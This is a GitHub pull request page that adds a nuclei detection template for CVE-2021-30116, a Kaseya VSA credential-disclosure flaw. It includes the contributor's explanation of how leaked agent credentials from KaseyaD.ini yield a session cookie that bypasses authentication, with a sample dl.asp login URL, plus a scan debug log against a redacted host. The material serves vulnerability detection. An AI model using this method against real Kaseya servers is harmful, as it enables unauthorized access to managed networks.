Skip to content

Add CVE-2021-30116 (KEV and vKEV) #13558

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 1 commit into from
Oct 20, 2025
Merged

Add CVE-2021-30116 (KEV and vKEV) #13558

merged 1 commit into from
Oct 20, 2025

Conversation

@daffainfo
Copy link
Contributor

@daffainfo daffainfo commented Oct 11, 2025

Template / PR Information

Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\Program Files (x86)\Kaseya\XXXXXXXXXX\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/dl.asp

GET /dl.asp HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/dl.asp

HTTP/1.1 200 OK
Connection: close
Content-Length: 6931
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:38 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET


<html>
<head>
<title>Download Agent</title>
<link rel="shortcut icon" href="/themes/default/images/favicon.ico?0.840870477993253">
<meta name="robots" content="noindex,nofollow" />
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0"/>
[SNIPPET]

</head>
<script language='javascript'>
removeFile = true;
unType = "0";
function removeDownload() {
    // launch a new window to run an ASP page in that will delete the download
    // package with this page is unloaded. Make it invisible by positioning it off screen
    if (removeFile == true) {
        delDownloadWin = window.open("/remdl.asp?un="+unType,"delDownloadWin",
            "dependent,toolbar=no,resizable=no,width=2,height=2,top=3000,left=3000");
    }
}
function setupDownload(dlLink) {
    if (dlLink.indexOf("?id=") > 0) {
        unType = "VSA-default-"+dlLink.substr(dlLink.indexOf("?id=")+"?id=".length);
    }
    dlWin = window.open(dlLink,"dlWin","dependent,width=2,height=2,top=3000,left=3000");
}
</script>
<body topmargin=0 leftmargin=3 bgcolor="#FFFFFF" onUnload="removeDownload()">
<p><img src='/ManagedFiles/SiteCustomization/2008logo.gif'></p><p>Install the <b></b> Agent on your machine.<br>The Agent allows your system administrator to remotely and transparently manage your PC.</p><ol><li>Click  to begin installation of the Agent</li><li>Click <b>Open</b> to run this program from its current location</li></ol> <table style='margin:10px 0px 30px 30px;'><tr><td style='padding-right:20px;'><a href='javascript:setupDownload("/mkDefault.asp?id=-1")'>Default Install</a></td><td>Creates a agent in the public &#34;unnamed&#34; group ID.</td></tr><tr><td style='padding-right:20px;'><a href='javascript:setupDownload("/mkDefault.asp?id=11225348")'>Mac Install</a></td><td>For Mac</td></tr> </table>
</body>
</html>
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/mkDefault.asp?id=-1

GET /mkDefault.asp?id=-1 HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: ASPSESSIONIDQCCTRRST=INPJEKOAPCICGHJAOPHPADDJ
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/mkDefault.asp?id=-1

HTTP/1.1 302 Object moved
Connection: close
Content-Length: 157
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:39 GMT
Location: /install/VSA-default--1/KcsSetup.exe
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/install/VSA-default--1/KcsSetup.exe">here</a>.</body>
[CVE-2021-30116:regex-1] [http] [critical] https://REDACTED/mkDefault.asp?id=-1
[CVE-2021-30116:status-2] [http] [critical] https://REDACTED/mkDefault.asp?id=-1
[INF] [CVE-2021-30116] Dumped HTTP request for https://REDACTED/mkDefault.asp?id=11225348

GET /mkDefault.asp?id=11225348 HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Accept: */*
Accept-Language: en
Cookie: ASPSESSIONIDQCCTRRST=INPJEKOAPCICGHJAOPHPADDJ
Accept-Encoding: gzip

[DBG] [CVE-2021-30116] Dumped HTTP response https://REDACTED/mkDefault.asp?id=11225348

HTTP/1.1 302 Object moved
Connection: close
Content-Length: 163
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Sat, 11 Oct 2025 04:18:41 GMT
Location: /install/VSA-default-11225348/KcsSetup.zip
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/install/VSA-default-11225348/KcsSetup.zip">here</a>.</body>
[INF] Scan completed in 4.864080833s. 2 matches found.

@github-actions github-actions bot requested a review from pussycat0x October 11, 2025 04:22
@Akokonunes Akokonunes added the Done Ready to merge label Oct 11, 2025
@Akokonunes
Copy link
Contributor

Akokonunes commented Oct 11, 2025

Hi @daffainfo, Thank you for contributing templates to the project.

@pussycat0x pussycat0x merged commit 974169b into projectdiscovery:main Oct 20, 2025
4 checks passed
@algora-pbc
Copy link

algora-pbc bot commented Oct 21, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@pussycat0x pussycat0x pussycat0x approved these changes

Assignees

@Akokonunes Akokonunes

Labels

Done Ready to merge Hacktoberfest 💰 Rewarded

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@daffainfo @Akokonunes @pussycat0x